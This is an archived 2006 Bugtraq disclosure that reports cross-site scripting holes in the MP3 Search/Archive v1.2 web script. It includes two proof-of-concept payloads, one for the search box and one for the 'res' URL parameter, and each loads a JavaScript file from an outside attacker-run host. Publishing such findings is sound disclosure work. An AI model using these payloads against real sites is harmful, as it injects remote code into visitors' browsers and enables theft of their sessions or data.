lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060615071802.28913.qmail@securityfocus.com> Date: 15 Jun 2006 07:18:02 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: MP3 Search/Archive v1.2 - XSS MP3 Search/Archive v1.2 Homepage: http://www.bloodys.com Affected files: Search input box. index.php Data is not properally sanatized before its generated. For PoC try putting the code below in the search box: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/mp3search.jpg XSS vuln via res variable on index.php. PoC: http://www.example.com/search/index.php?letter=O&p=2&res=92">">">">'>'><"">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<'<' Screenshots: http://www.youfucktard.com/xsp/mp3search2.jpg http://www.youfucktard.com/xsp/mp3search3.jpg